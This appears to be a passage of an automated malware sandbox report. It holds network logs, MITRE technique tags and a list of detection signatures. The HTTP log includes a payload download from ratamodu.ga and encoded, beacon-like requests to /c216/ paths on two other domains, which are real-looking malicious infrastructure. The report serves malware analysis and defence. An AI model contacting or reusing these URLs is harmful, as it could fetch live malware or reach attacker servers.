2020-06-05 14:10:48.196 192.168.1.6 49205 172.217.23.99 443 C=US, ST=California, L=Mountain View, O=Google LLC, CN=upload.video.google.com ea:2f:e9:4b:45:d4:c2:92:9d:3c:2f:d8:42:92:08:68:20:bd:86:ad TLS 1.2
2020-06-05 14:11:03.627 192.168.1.6 49208 52.114.132.20 443 CN=*.events.data.microsoft.com 1a:c2:39:ff:84:fe:1a:c9:81:f5:45:9a:d0:a0:f2:66:d1:8c:38:c9 TLS 1.2
2020-06-05 14:12:07.178 192.168.1.6 49212 52.114.128.43 443 CN=*.events.data.microsoft.com 1a:c2:39:ff:84:fe:1a:c9:81:f5:45:9a:d0:a0:f2:66:d1:8c:38:c9 TLS 1.2

Suricata HTTP

Timestamp Source IP Source Port Destination IP Destination Port Method Status Hostname URI Content Type User Agent Referrer Length
2020-06-05 14:09:09.545 192.168.1.6 49190 8.248.135.254 80 200 ctldl.windowsupdate.com /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?c05362e6e894290d application/vnd.ms-cab-compressed Microsoft-CryptoAPI/6.1 None 6894
2020-06-05 14:09:10.652 192.168.1.6 49191 72.21.91.29 80 200 ocsp.digicert.com /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D application/ocsp-response Microsoft-CryptoAPI/6.1 None 1507
2020-06-05 14:09:13.059 192.168.1.6 49191 72.21.91.29 80 200 ocsp.digicert.com /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D application/ocsp-response Microsoft-CryptoAPI/6.1 None 1507
2020-06-05 14:09:27.124 192.168.1.6 49202 84.38.181.216 80 200 ratamodu.ga /~zadmin/group/apsfb_BwRMswJ149.bin application/octet-stream Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko None 172096
2020-06-05 14:10:20.841 192.168.1.6 49204 23.227.38.64 80 403 www.thetoptitle.com /c216/?lxldz=Nnqh7TNKIIDcqdzGNwugJZtqnGWTOdvJypW6t/M5WntLNAJT3RrvH7SpKhfW7prI&Tj=YBZ4 text/html None None 1794
2020-06-05 14:10:54.885 192.168.1.6 49206 172.217.16.142 80 302 redirector.gvt1.com /edgedl/release2/update2/AOVe98a3fi3oIA5CfTl3ibc_1.3.35.452/GoogleUpdateSetup.exe text/html Microsoft BITS/7.5 None 0
2020-06-05 14:10:56.641 192.168.1.6 49207 144.208.213.45 80 200 r2---sn-5oxmp55u-8pxe.gvt1.com /edgedl/release2/update2/AOVe98a3fi3oIA5CfTl3ibc_1.3.35.452/GoogleUpdateSetup.exe?cms_redirect=yes&mh=9Y&mip=185.220.100.242&mm=28&mn=sn-5oxmp55u-8pxe&ms=nvh&mt=1591366156&mv=m&mvi=1&pl=24&shardbypass=yes application/octet-stream Microsoft BITS/7.5 None 0
2020-06-05 14:11:06.012 192.168.1.6 49209 72.21.91.29 80 200 ocsp.digicert.com /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D application/ocsp-response Microsoft-CryptoAPI/6.1 None 1507
2020-06-05 14:11:35.711 192.168.1.6 49207 144.208.213.45 80 206 r2---sn-5oxmp55u-8pxe.gvt1.com /edgedl/release2/update2/AOVe98a3fi3oIA5CfTl3ibc_1.3.35.452/GoogleUpdateSetup.exe?cms_redirect=yes&mh=9Y&mip=185.220.100.242&mm=28&mn=sn-5oxmp55u-8pxe&ms=nvh&mt=1591366156&mv=m&mvi=1&pl=24&shardbypass=yes application/octet-stream Microsoft BITS/7.5 None 6388
2020-06-05 14:11:49.953 192.168.1.6 49210 184.168.221.40 80 None www.barsoum.dentist /c216/?lxldz=qDsuE3Dsv2OzkxyZUeXZwGu6bH8qaHXOomLR5n8tK0jzX5EyijM1plB0iZv+jWrr&Tj=YBZ4&sql=1 None None None 0
2020-06-05 14:11:51.962 192.168.1.6 49211 184.168.221.40 80 None www.barsoum.dentist /c216/ None Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko http://www.barsoum.dentist/c216/ 0
2020-06-05 14:12:18.372 192.168.1.6 49207 144.208.213.45 80 206 r2---sn-5oxmp55u-8pxe.gvt1.com /edgedl/release2/update2/AOVe98a3fi3oIA5CfTl3ibc_1.3.35.452/GoogleUpdateSetup.exe?cms_redirect=yes&mh=9Y&mip=185.220.100.242&mm=28&mn=sn-5oxmp55u-8pxe&ms=nvh&mt=1591366156&mv=m&mvi=1&pl=24&shardbypass=yes application/octet-stream Microsoft BITS/7.5 None 10303
2020-06-05 14:12:20.216 192.168.1.6 49213 72.21.91.29 80 200 ocsp.digicert.com /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D application/ocsp-response Microsoft-CryptoAPI/6.1 None 1507
2020-06-05 14:12:20.460 192.168.1.6 49214 72.21.91.29 80 200 crl3.digicert.com /Omniroot2025.crl application/x-pkcs7-crl Microsoft-CryptoAPI/6.1 None 5354
2020-06-05 14:12:25.061 192.168.1.6 49207 144.208.213.45 80 206 r2---sn-5oxmp55u-8pxe.gvt1.com /edgedl/release2/update2/AOVe98a3fi3oIA5CfTl3ibc_1.3.35.452/GoogleUpdateSetup.exe?cms_redirect=yes&mh=9Y&mip=185.220.100.242&mm=28&mn=sn-5oxmp55u-8pxe&ms=nvh&mt=1591366156&mv=m&mvi=1&pl=24&shardbypass=yes application/octet-stream Microsoft BITS/7.5 None 56824
Sorry! No dropped Suricata Extracted files.

JA3

Source Source Port Destination Destination Port JA3 Hash JA3 Description
Sorry! No dropped files.
Sorry! No CAPE files.
Sorry! No process dumps.
Defense Evasion Privilege Escalation
  • T1116 - Code Signing
    • Signature - invalid_authenticode_signature
  • T1055 - Process Injection
    • Signature - InjectionInterProcess

    Processing ( 29.694 seconds )

    • 23.421 NetworkAnalysis
    • 5.235 Suricata
    • 0.534 CAPE
    • 0.193 VirusTotal
    • 0.127 BehaviorAnalysis
    • 0.1 Static
    • 0.029 Deduplicate
    • 0.025 AnalysisInfo
    • 0.013 TargetInfo
    • 0.006 peid
    • 0.004 Debug
    • 0.004 Dropped
    • 0.002 Strings
    • 0.001 ProcDump

    Signatures ( 0.214 seconds )

    • 0.046 antiav_detectreg
    • 0.018 infostealer_ftp
    • 0.017 territorial_disputes_sigs
    • 0.012 ransomware_files
    • 0.01 infostealer_im
    • 0.009 antianalysis_detectreg
    • 0.007 ransomware_extensions
    • 0.006 antiav_detectfile
    • 0.005 antidbg_windows
    • 0.005 antivm_vbox_keys
    • 0.005 network_cnc_http
    • 0.004 persistence_autorun
    • 0.004 antianalysis_detectfile
    • 0.004 modify_proxy
    • 0.004 infostealer_bitcoin
    • 0.004 infostealer_mail
    • 0.003 api_spamming
    • 0.003 decoy_document
    • 0.003 antivm_vmware_keys
    • 0.003 masquerade_process_name
    • 0.003 network_torgateway
    • 0.002 kibex_behavior
    • 0.002 NewtWire Behavior
    • 0.002 antivm_parallels_keys
    • 0.002 antivm_vbox_files
    • 0.002 antivm_xen_keys
    • 0.002 geodo_banking_trojan
    • 0.002 browser_security
    • 0.002 disables_browser_warn
    • 0.002 network_dns_opennic
    • 0.002 recon_checkip
    • 0.001 InjectionCreateRemoteThread
    • 0.001 antiemu_wine_func
    • 0.001 antivm_generic_disk
    • 0.001 antivm_vbox_libs
    • 0.001 betabot_behavior
    • 0.001 dynamic_function_loading
    • 0.001 exec_crash
    • 0.001 malicious_dynamic_function_loading
    • 0.001 mimics_filetime
    • 0.001 stealth_timeout
    • 0.001 tinba_behavior
    • 0.001 antidbg_devices
    • 0.001 antivm_generic_diskreg
    • 0.001 antivm_vpc_keys
    • 0.001 ketrican_regkeys
    • 0.001 network_http
    • 0.001 revil_mutexes
    • 0.001 limerat_regkeys
    • 0.001 recon_fingerprint

    Reporting ( 240.99 seconds )

    • 234.049 PCAP2CERT
    • 6.893 BinGraph
    • 0.048 MITRE_TTPS